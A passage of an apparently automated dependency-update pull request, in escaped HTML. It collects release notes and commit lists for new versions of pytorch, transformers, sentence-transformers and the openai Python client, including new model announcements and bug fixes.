href=\"https://redirect.github.com/pytorch/pytorch/issues/181886\"\u003e#181886\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/9da6087ab64ab6a2118686420ca5353c90dd7e1f\"\u003e\u003ccode\u003e9da6087\u003c/code\u003e\u003c/a\u003e Fix stale PYTORCH_RELEASES_CODE_CC dict (fixes \u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182250\"\u003e#182250\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182369\"\u003e#182369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/e4c37cc011d47246ce8ea4b99c9b28fb7f400224\"\u003e\u003ccode\u003ee4c37cc\u003c/code\u003e\u003c/a\u003e Avoid raw stream name collisions in Inductor (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182178\"\u003e#182178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/822d047dc8dd8d919f83c3ad5c786e405075d1f0\"\u003e\u003ccode\u003e822d047\u003c/code\u003e\u003c/a\u003e [MPS] Fix bool mask handling in 1-pass SDPA decode kernel (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182285\"\u003e#182285\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182311\"\u003e#182311\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/5c5e523cd520e6986006e45be243b3ee927ea546\"\u003e\u003ccode\u003e5c5e523\u003c/code\u003e\u003c/a\u003e Add enable_gqa parameter to SDPA MPS meta registration (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/181550\"\u003e#181550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/eece52ead16886e5463c3dcee9b04db783cc68d5\"\u003e\u003ccode\u003eeece52e\u003c/code\u003e\u003c/a\u003e [AOTI] Add BC-safe c_shim v2 for _scaled_dot_product_attention_math_for_mps e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/b39330bbe210b9628207e84d8ba2cabb7975fbac\"\u003e\u003ccode\u003eb39330b\u003c/code\u003e\u003c/a\u003e [Inductor] Call latest c_shim version for versioned fallback ops (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/181548\"\u003e#181548\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/06f10d088229a25ac52bd14b6cacc04a4161f6ca\"\u003e\u003ccode\u003e06f10d0\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;[FSDP2] add fqn to communication ops\u0026quot; (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182100\"\u003e#182100\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182157\"\u003e#182157\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/449e3393139a1aca9afec120c9a63f98f12d55b0\"\u003e\u003ccode\u003e449e339\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;[Inductor] Improve materialization heuristic for a chain of computaio...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytorch/pytorch/compare/v2.11.0...v2.12.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `transformers` from 5.7.0 to 5.10.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/huggingface/transformers/releases\"\u003etransformers's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ePatch release v5.10.2\u003c/h1\u003e\n\u003cp\u003eThere was a big bug in the model conversion of models related to clip, this affected models like sam3 and others. Please make sure to update :pray:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix conversion for clip models by \u003ca href=\"https://github.com/zucchini-nlp\"\u003e\u003ccode\u003e@​zucchini-nlp\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46406\"\u003e#46406\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/huggingface/transformers/compare/v5.10.1...v5.10.2\"\u003ehttps://github.com/huggingface/transformers/compare/v5.10.1...v5.10.2\u003c/a\u003e\u003c/p\u003e\n\u003ch1\u003eRelease v5.10.1\u003c/h1\u003e\n\u003cp\u003ev5.10.0 was yanked as we publish on a corrupted branch. Sorry everyone, this happens when we rush a release!!!\u003c/p\u003e\n\u003ch2\u003eNew Model additions\u003c/h2\u003e\n\u003ch3\u003eGemma4 unified+ Gemma4 MTP\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eGemma 4 12B Unified is an \u003cstrong\u003eencoder-free\u003c/strong\u003e multimodal model with pretrained and instruction-tuned variants. Unlike \u003ca href=\"https://github.com/huggingface/transformers/blob/HEAD/gemma4\"\u003estandard Gemma 4\u003c/a\u003e, which uses dedicated encoder towers, Gemma 4 12B Unified projects raw inputs directly into the language model's embedding space through lightweight linear pipelines. This results in a simpler architecture while maintaining strong multimodal performance.\u003c/p\u003e\n\u003cp\u003eKey differences from standard Gemma 4:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eNo Vision Tower\u003c/strong\u003e: Raw pixel patches are projected directly into LM space via a \u003ccode\u003eDense + LayerNorm\u003c/code\u003e pipeline with factorized 2D positional embeddings, replacing the vision encoder.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNo Audio Tower\u003c/strong\u003e: Raw 16 kHz waveform samples are chunked into fixed-length frames and projected through a simple \u003ccode\u003eRMSNorm → Linear\u003c/code\u003e pipeline, replacing the mel spectrogram + Conformer encoder.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eShared Multimodal Pipeline\u003c/strong\u003e: Both vision and audio use the same \u003ccode\u003eGemma4UnifiedMultimodalEmbedder\u003c/code\u003e (RMSNorm → Linear) for the final projection to text hidden space.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eYou can find the original Gemma 4 12B Unified checkpoints under the \u003ca href=\"https://huggingface.co/collections/google/gemma-4\"\u003eGemma 4\u003c/a\u003e release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ewho needs encoders? (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46385\"\u003e#46385\u003c/a\u003e) by \u003ca href=\"https://github.com/douglas-reid\"\u003e\u003ccode\u003e@​douglas-reid\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/sgerrard\"\u003e\u003ccode\u003e@​sgerrard\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/vasqu\"\u003e\u003ccode\u003e@​vasqu\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/molbap\"\u003e\u003ccode\u003e@​molbap\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eSapiens2\u003c/h3\u003e\n\u003cp\u003eSapiens2 is a family of high-resolution vision transformers pretrained on ~1 billion curated human images, designed for human-centric computer vision tasks including pose estimation, body-part segmentation, surface normal estimation, and pointmap estimation. The models scale from 0.4B to 5B parameters and train at native 1K resolution, with hierarchical 4K variants for extended spatial reasoning. Sapiens2 achieves substantial improvements over its predecessor with +4 mAP in pose estimation, +24.3 mIoU in body-part segmentation, and 45.6% error reduction in normal estimation.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/sapiens2\"\u003eDocumentation\u003c/a\u003e | \u003ca href=\"https://huggingface.co/papers/2604.21681\"\u003ePaper\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Sapiens2 Model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45919\"\u003e#45919\u003c/a\u003e) by \u003ca href=\"https://github.com/guarin\"\u003e\u003ccode\u003e@​guarin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/45919\"\u003e#45919\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDeepSeek-OCR-2\u003c/h3\u003e\n\u003cp\u003eDeepSeek-OCR-2 is an OCR-specialized vision-language model built on a distinctive architecture that combines a SAM ViT-B vision encoder with a Qwen2 hybrid attention encoder, connected through an MLP projector to a DeepSeek-V2 Mixture-of-Experts (MoE) language model. The model features a hybrid attention mechanism that applies bidirectional attention over image tokens and causal attention over query tokens, enabling efficient and accurate document understanding. It supports both plain OCR tasks and grounding capabilities with coordinate-aware output for document conversion to markdown format.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/deepseek_ocr2\"\u003eDocumentation\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Deepseek-OCR-2 model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45075\"\u003e#45075\u003c/a\u003e) by \u003ca href=\"https://github.com/thisisiron\"\u003e\u003ccode\u003e@​thisisiron\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/45075\"\u003e#45075\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMellum\u003c/h3\u003e\n\u003cp\u003eMellum is a code-focused Mixture-of-Experts language model developed by JetBrains. It is derived from the Qwen3-MoE architecture with per-layer-type RoPE and interleaved sliding window attention. The model has 12B total parameters with 2.5B active parameters per token, using 64 routed experts with 8 activated per token across 28 layers.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/mellum\"\u003eDocumentation\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Add support for JetBrains' \u003ccode\u003eMellum\u003c/code\u003e v2 code generation model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46112\"\u003e#46112\u003c/a\u003e) by \u003ca href=\"https://github.com/shadeMe\"\u003e\u003ccode\u003e@​shadeMe\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/46112\"\u003e#46112\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/0dad7b822255a0ae261ec45ae937371e859ffd1a\"\u003e\u003ccode\u003e0dad7b8\u003c/code\u003e\u003c/a\u003e v5.10.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/8a4ffee847b90a732a1febefeca5180fffd5596f\"\u003e\u003ccode\u003e8a4ffee\u003c/code\u003e\u003c/a\u003e Fix conversion for clip models (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46406\"\u003e#46406\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/90c3ae54d448d4906b6167317ea5a7f5d48a232d\"\u003e\u003ccode\u003e90c3ae5\u003c/code\u003e\u003c/a\u003e Patch because we had to yank 5.10 because the release branch was not up to date\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/0bd94b37db639d8f29a094dce2fde06f86af8968\"\u003e\u003ccode\u003e0bd94b3\u003c/code\u003e\u003c/a\u003e v5.10.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/1423d22f7a3b62e8c70ad67b58ec25cd9b675897\"\u003e\u003ccode\u003e1423d22\u003c/code\u003e\u003c/a\u003e who needs encoders? (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46385\"\u003e#46385\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/50eb20a24f9dd512e6770072f422e4b86ca3cd98\"\u003e\u003ccode\u003e50eb20a\u003c/code\u003e\u003c/a\u003e Fix dsv4 dequant + tp/ep (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46378\"\u003e#46378\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/74464e8c49c91b574c30cc3cb3c5a44000237299\"\u003e\u003ccode\u003e74464e8\u003c/code\u003e\u003c/a\u003e Fix wrong changes produced by style/repo. check bot (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46371\"\u003e#46371\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/1b8ec344fb6c277235fc76c37e7a5c156a1f0ddc\"\u003e\u003ccode\u003e1b8ec34\u003c/code\u003e\u003c/a\u003e Fix path traversal when saving Bark voice preset embeddings (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46237\"\u003e#46237\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/e820678256f22e7647e39e8b7ed040fa81b7b872\"\u003e\u003ccode\u003ee820678\u003c/code\u003e\u003c/a\u003e Add Sapiens2 Model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45919\"\u003e#45919\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/595721c44cb14db37fa504903e2edd5e9f0eba43\"\u003e\u003ccode\u003e595721c\u003c/code\u003e\u003c/a\u003e Pass library_name/version to Hub calls via a shared HfApi (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46318\"\u003e#46318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/huggingface/transformers/compare/v5.7.0...v5.10.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sentence-transformers` from 5.4.1 to 5.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/huggingface/sentence-transformers/releases\"\u003esentence-transformers's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.5.1 - Small Multimodal patch\u003c/h2\u003e\n\u003cp\u003eThis patch release fixes a small quirk with multimodal inference when using single-key multimodal inputs like \u003ccode\u003emodel.encode({\u0026quot;image\u0026quot;: ...})\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eInstall this version with\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003e# Training + Inference\r\npip install sentence-transformers[train]==5.5.1\r\n\u003ch1\u003eInference only, use one of:\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers==5.5.1\npip install sentence-transformers[onnx-gpu]==5.5.1\npip install sentence-transformers[onnx]==5.5.1\npip install sentence-transformers[openvino]==5.5.1\u003c/p\u003e\n\u003ch1\u003eMultimodal dependencies (optional):\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers[image]==5.5.1\npip install sentence-transformers[audio]==5.5.1\npip install sentence-transformers[video]==5.5.1\u003c/p\u003e\n\u003ch1\u003eOr combine as needed:\u003c/h1\u003e\n\u003cp\u003epip install sentence-transformers[train,onnx,image]==5.5.1\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003ch2\u003eBug fixed\u003c/h2\u003e\n\u003cp\u003ePreviously, inference like \u003ccode\u003emodel.encode({\u0026quot;image\u0026quot;: ...})\u003c/code\u003e or \u003ccode\u003emodel.encode([{\u0026quot;image\u0026quot;: ...}, ...])\u003c/code\u003e would be inferred as the \u003ccode\u003e(\u0026quot;image\u0026quot;,)\u003c/code\u003e modality, which differed from the inferred modality of \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e for just \u003ccode\u003emodel.encode(my_image)\u003c/code\u003e or \u003ccode\u003emodel.encode([my_image, my_image_2, ...])\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eThis results in confusing errors if the model doesn't have a \u003ccode\u003emodality_config\u003c/code\u003e mapping for \u003ccode\u003e(\u0026quot;image\u0026quot;,)\u003c/code\u003e in addition to \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e, so now a single-key multimodal dict is collapsed to the bare modality (just \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e in this example).\u003c/p\u003e\n\u003cp\u003eThis affected this code:\u003c/p\u003e\n\u003cpre lang=\"python\"\u003e\u003ccode\u003e\r\nfrom sentence_transformers import SentenceTransformer\r\n\u003cp\u003emodel = SentenceTransformer('BAAI/BGE-VL-base', trust_remote_code=True)\nembedding = model.encode({\u0026quot;image\u0026quot;: \u0026quot;\u003ca href=\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/blog/ettin-reranker/mteb_ndcg10_all-MiniLM-L6-v2.png\u0026amp;quot;%7D\"\u003ehttps://huggingface.co/datasets/huggingface/documentation-images/resolve/main/blog/ettin-reranker/mteb_ndcg10_all-MiniLM-L6-v2.png\u0026amp;quot;}\u003c/a\u003e)\nprint(embedding.shape)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cp\u003eWhich previously failed as the model only implements a path for \u003ccode\u003e\u0026quot;text\u0026quot;\u003c/code\u003e, \u003ccode\u003e\u0026quot;image\u0026quot;\u003c/code\u003e, and \u003ccode\u003e(\u0026quot;image\u0026quot;, \u0026quot;text\u0026quot;)\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003eAll Changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Collapse single-key multimodal dicts to bare modality by \u003ca href=\"https://github.com/tomaarsen\"\u003e\u003ccode\u003e@​tomaarsen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3779\"\u003e#3779\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/huggingface/sentence-transformers/compare/v5.5.0...v5.5.1\"\u003ehttps://github.com/huggingface/sentence-transformers/compare/v5.5.0...v5.5.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.0 - Training Agent Skill, EmbedDistillLoss, and ADRMSELoss\u003c/h2\u003e\n\u003cp\u003eThis release ships the \u003ccode\u003etrain-sentence-transformers\u003c/code\u003e Agent Skill, adds two new training losses, and brings a long list of robustness and correctness fixes.\u003c/p\u003e\n\u003cp\u003eThe new \u003ccode\u003etrain-sentence-transformers\u003c/code\u003e Agent Skill lets AI coding agents (Claude Code, Codex, Cursor, Gemini CLI, ...) drive end-to-end training and fine-tuning across all three model types. \u003ccode\u003eEmbedDistillLoss\u003c/code\u003e is a new embedding-level knowledge distillation loss for \u003ccode\u003eSentenceTransformer\u003c/code\u003e: it aligns a student model's embeddings with pre-computed teacher embeddings, an alternative to the score-based distillation provided by \u003ccode\u003eMarginMSELoss\u003c/code\u003e and \u003ccode\u003eDistillKLDivLoss\u003c/code\u003e. \u003ccode\u003eADRMSELoss\u003c/code\u003e is a new listwise learning-to-rank loss for \u003ccode\u003eCrossEncoder\u003c/code\u003e from the Rank-DistiLLM paper. \u003ccode\u003eencode()\u003c/code\u003e and \u003ccode\u003epredict()\u003c/code\u003e also gain a per-call \u003ccode\u003eprocessing_kwargs\u003c/code\u003e override, and more.\u003c/p\u003e\n\u003cp\u003eInstall this version with\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/ce3ec6d87f25b2d1cccb0a20f8fd495dad5c30fb\"\u003e\u003ccode\u003ece3ec6d\u003c/code\u003e\u003c/a\u003e Release v5.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/610a7c5ccfdfccc19933900feba0206f2e76bf59\"\u003e\u003ccode\u003e610a7c5\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003efix\u003c/code\u003e] Collapse single-key multimodal dicts to bare modality (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3779\"\u003e#3779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/f9f3269c7bd548555b7273a5378d52eeaa5d6286\"\u003e\u003ccode\u003ef9f3269\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into v5.5-release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/02dc21d77dfd22b5816fb5398877253100b89b43\"\u003e\u003ccode\u003e02dc21d\u003c/code\u003e\u003c/a\u003e Update index tip for v5.5.0 (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3774\"\u003e#3774\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/833828b3dae0cf9e6943ae01b9c9645f883daf3b\"\u003e\u003ccode\u003e833828b\u003c/code\u003e\u003c/a\u003e Release v5.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/98ac358861359fd275824732e5f658b2f4ca6c78\"\u003e\u003ccode\u003e98ac358\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Load models in float32 in the training examples \u0026amp; docs (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3773\"\u003e#3773\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/d8ee0410ba140f41aa2ac0735a97e1d690dd2df5\"\u003e\u003ccode\u003ed8ee041\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Use modality-neutral terms (input, document) in loss docs \u0026amp; docstrin...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/4c6850e444e5bcedfb026e9d674ae18c19ab5233\"\u003e\u003ccode\u003e4c6850e\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003eexamples\u003c/code\u003e] Avoid LoggingHandler, silence httpx in examples (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3771\"\u003e#3771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/1418823d250763751ea95212dfb9ecaa919f5e92\"\u003e\u003ccode\u003e1418823\u003c/code\u003e\u003c/a\u003e docs: fix grammar in parallel-sentence-mining README (\u003ca href=\"https://redirect.github.com/huggingface/sentence-transformers/issues/3769\"\u003e#3769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/sentence-transformers/commit/22a383d3644cfaa40038adb0b70a9320f7f73d36\"\u003e\u003ccode\u003e22a383d\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003edocs\u003c/code\u003e] Use direct class imports in examples \u0026amp; docs (drop `losses.MSELoss(.....\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/huggingface/sentence-transformers/compare/v5.4.1...v5.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `openai` from 2.32.0 to 2.41.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/openai/openai-python/releases\"\u003eopenai's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.41.0\u003c/h2\u003e\n\u003ch2\u003e2.41.0 (2026-06-03)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.40.0...v2.41.0\"\u003ev2.40.0...v2.41.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e responses.moderation and chat_completions.moderation (\u003ca href=\"https://github.com/openai/openai-python/commit/87e46c25ac9ca8cff407b52ad9fb33e326c059d6\"\u003e87e46c2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.40.0\u003c/h2\u003e\n\u003ch2\u003e2.40.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.39.0...v2.40.0\"\u003ev2.39.0...v2.40.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e Add Amazon Bedrock Responses support\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e allow setting bedrock api keys on the client directly (\u003ca href=\"https://github.com/openai/openai-python/commit/4d5bfdec37fa8a2b2a0413724755e586e627e28d\"\u003e4d5bfde\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.39.0\u003c/h2\u003e\n\u003ch2\u003e2.39.0 (2026-06-01)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.38.0...v2.39.0\"\u003ev2.38.0...v2.39.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e workload identity in audit logs, additional_tools item in responses, fix ActionSearch.query to be optional. (\u003ca href=\"https://github.com/openai/openai-python/commit/ab60d7a52c310bb0490ff36b8bdc33b8d4ea725f\"\u003eab60d7a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.38.0\u003c/h2\u003e\n\u003ch2\u003e2.38.0 (2026-05-21)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/openai/openai-python/compare/v2.37.0...v2.38.0\"\u003ev2.37.0...v2.38.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e api update (\u003ca href=\"https://github.com/openai/openai-python/commit/33d1d013250053886a73d178136e6bd1b09df059\"\u003e33d1d01\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e manual updates (\u003ca href=\"https://github.com/openai/openai-python/commit/a21700a2cd510cb9e6c88065ac8e942d4c041aa8\"\u003ea21700a\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e update OpenAPI spec or Stainless config (\u003ca href=\"https://github.com/openai/openai-python/commit/00265c5daba4d2481452ad35220f1556dab6bcf6\"\u003e00265c5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e docs updates (\u003ca href=\"https://github.com/openai/openai-python/commit/ee101520d49e22c09cf8096f8cbb3848ea58a1f9\"\u003eee10152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck release PR custom code sync (\u003ca href=\"https://github.com/openai/openai-python/commit/2638779a5b8fffaa8fdb6eebc1d734f15d2491f8\"\u003e2638779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove release automation trigger (\u003ca href=\"https://github.com/openai/openai-python/commit/bd6eea559f2996d914258a65e645981bdce3cad4\"\u003ebd6eea5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etrigger release automation (\u003ca href=\"https://github.com/openai/openai-python/commit/f62d08201eea8e08d4bb3385662f934d4adccb29\"\u003ef62d082\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.37.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca 